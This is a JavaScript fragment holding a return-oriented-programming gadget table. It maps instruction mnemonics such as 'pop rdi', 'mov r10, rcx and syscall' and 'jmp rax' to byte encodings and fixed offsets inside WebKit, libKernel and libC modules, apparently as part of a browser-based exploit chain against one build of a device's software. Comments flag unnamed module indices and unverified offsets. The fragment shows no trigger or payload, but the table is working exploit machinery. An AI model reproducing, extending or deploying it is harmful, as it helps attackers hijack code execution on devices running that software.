// Per-module base table. It is only declared here; nothing in this part of
// the file reads or writes it, so its contents are filled in elsewhere.
var moduleBases = [];
// Numeric module identifiers, used as the second argument to gadget() below.
// Several entries further down pass the raw values 12, 16 and 19 instead of
// a named constant, and libSystemService is declared but not referenced in
// this section — worth reconciling so every module index has one name.
var libKernel = 1;
var libC = 2;
var webkit = 14;
var libSystemService = 18;
// Table of code fragments keyed by a human-readable mnemonic. Each value is
// new gadget(bytes, moduleIndex, offset). The gadget constructor is not
// defined in this section, so what it does with its arguments is not visible
// here. The byte array appears to be the encoding of the instruction named
// in the key (e.g. 0x5d for "pop rbp"); the "call ..." and "jmp ..." entries
// pass an empty array. The third argument looks like a fixed offset into the
// selected module — presumably specific to one build of that module, so any
// change in module layout would invalidate the entry; TODO confirm against
// the gadget() definition. The object literal is not followed by a
// semicolon and relies on automatic semicolon insertion.
var gadgets = {
"pop rbp": new gadget([0x5d], webkit, 0xb5d6d),
"pop rax": new gadget([0x58], webkit, 0x3352d),
"pop rcx": new gadget([0x59], webkit, 0x2bec0d),
"pop rdx": new gadget([0x5a, 0xff, 0xc5], webkit, 0x3bbf9e),
"pop rsi": new gadget([0x5e], webkit, 0x3914ca),
"pop rdi": new gadget([0x5f], webkit, 0x137cbd),
"pop r8": new gadget([0x41, 0x58], webkit, 0xb854d),
"pop r9": new gadget([0x43, 0x59], webkit, 0x2bfe89),
"pop rsp": new gadget([0xf3, 0x5c], webkit, 0x5fbb5),
"mov r10, rcx and syscall": new gadget([0x49, 0x89, 0xca, 0x0f, 0x05], libKernel, 0x457),
"mov [rax+0x1e8], rdx": new gadget([0x48, 0x89, 0x90, 0xe8, 0x01, 0x00, 0x00], libKernel, 0x1622),
"mov [rax+0x60], rdi": new gadget([0x48, 0x89, 0x78, 0x60], webkit, 0x2b7274),
"mov [rax+0x8], rsi": new gadget([0x48, 0x89, 0x70, 0x08], libKernel, 0x9414),
"mov [rax+0xc0], rcx": new gadget([0x48, 0x89, 0x88, 0xc0, 0x00, 0x00, 0x00], webkit, 0x369e6d),
"mov [rax], rcx": new gadget([0x48, 0x89, 0x08], webkit, 0x9ecde6),
"mov [rax], rdx": new gadget([0x48, 0x89, 0x10], webkit, 0x3579c0),
"mov [rax], rsi": new gadget([0x48, 0x89, 0x30], webkit, 0x2adea7),
"mov [rcx], rax": new gadget([0x48, 0x89, 0x01], webkit, 0xc320),
// Raw module index 12 — no named constant is declared for it in this section.
"mov [rcx], rdx": new gadget([0x48, 0x89, 0x11], 12, 0x5b00),
// Raw module index 16 — no named constant is declared for it in this section.
"mov [rdx], rcx": new gadget([0x48, 0x89, 0x0a], 16, 0x340bd),
"mov [rdx], rsi": new gadget([0x48, 0x89, 0x32], 16, 0x1b822),
"mov [rsi+0x18], rax": new gadget([0x48, 0x89, 0x46, 0x18], webkit, 0x470f5),
"mov [rsi+0x8], r8": new gadget([0x4c, 0x89, 0x46, 0x08], webkit, 0x14af6d),
"mov [rsi], rcx": new gadget([0x48, 0x89, 0x0e], webkit, 0x38c39f),
"mov [rdi], rax": new gadget([0x48, 0x89, 0x07], libKernel, 0xb0c8),
"mov [rdi+0x88], rax": new gadget([0x48, 0x89, 0x87, 0x88, 0x00, 0x00, 0x00], webkit, 0x1c0e03),
"mov [rdi+0xa0], rcx": new gadget([0x48, 0x89, 0x8f, 0xa0, 0x00, 0x00, 0x00], webkit, 0xb6b5),
"mov [rdi+0x80], rdx": new gadget([0x48, 0x89, 0x97, 0x80, 0x00, 0x00, 0x00], webkit, 0xa2da64),
"mov [rdi+0x80], rsi": new gadget([0x48, 0x89, 0xb7, 0x80, 0x00, 0x00, 0x00], webkit, 0x3dc290),
"mov [rdi+0x20], r8": new gadget([0x4c, 0x89, 0x47, 0x20], 12, 0x40415),
"mov [rdi+0x20], rdx": new gadget([0x48, 0x89, 0x57, 0x20], 12, 0x38796),
"mov [r10], rdi": new gadget([0x49, 0x89, 0x3a], 16, 0x1ba44),
"mov [r10], rdx": new gadget([0x49, 0x89, 0x12], 16, 0x1b79b),
"mov [r10], rsi": new gadget([0x49, 0x89, 0x32], 16, 0x1b8cd),
"mov rdi, [rdi+0x48]": new gadget([0x48, 0x8b, 0x7f, 0x48], libKernel, 0x1bd50),
// Raw module index 19 — no named constant is declared for it in this section.
"mov rax, [rax+0x830]": new gadget([0x48, 0x8b, 0x80, 0x30, 0x08, 0x00, 0x00], 19, 0x1957),
"mov rax, [rdi]": new gadget([0x48, 0x8b, 0x07], libKernel, 0x172b0),
"mov rax, [rdi+0x18]": new gadget([0x48, 0x8b, 0x47, 0x18], libKernel, 0x172f0),
"mov rax, [r10]": new gadget([0x49, 0x8b, 0x02], 16, 0xd93d),
"mov rax, [r11]": new gadget([0x49, 0x8b, 0x03], 16, 0xd936),
"mov rdx, [rdi+0x8]": new gadget([0x48, 0x8b, 0x57, 0x08], libC, 0x6573),
"mov rax, rdi": new gadget([0x48, 0x89, 0xf8], libKernel, 0x1dc20),
"mov rax, rsi": new gadget([0x48, 0x89, 0xf0], libKernel, 0x94d1),
"mov rax, r8": new gadget([0x4c, 0x89, 0xc0], 16, 0xeb36),
"mov rdx, rdi": new gadget([0x48, 0x89, 0xfa], libC, 0x860f),
// The call/jmp entries carry no byte pattern, only a module index and offset.
"call rax": new gadget([], libKernel, 0x48),
"call rbx": new gadget([], libKernel, 0x6143),
"call rcx": new gadget([], libKernel, 0x1128d),
"call rdx": new gadget([], libKernel, 0x100c3),
"call rsi": new gadget([], libKernel, 0xe1c8),
"jmp rax": new gadget([], libKernel, 0x94),
"jmp rbx": new gadget([], libKernel, 0x26ac7),
"jmp rcx": new gadget([], libKernel, 0xb9c6),
"jmp rdx": new gadget([], libKernel, 0x666d),
}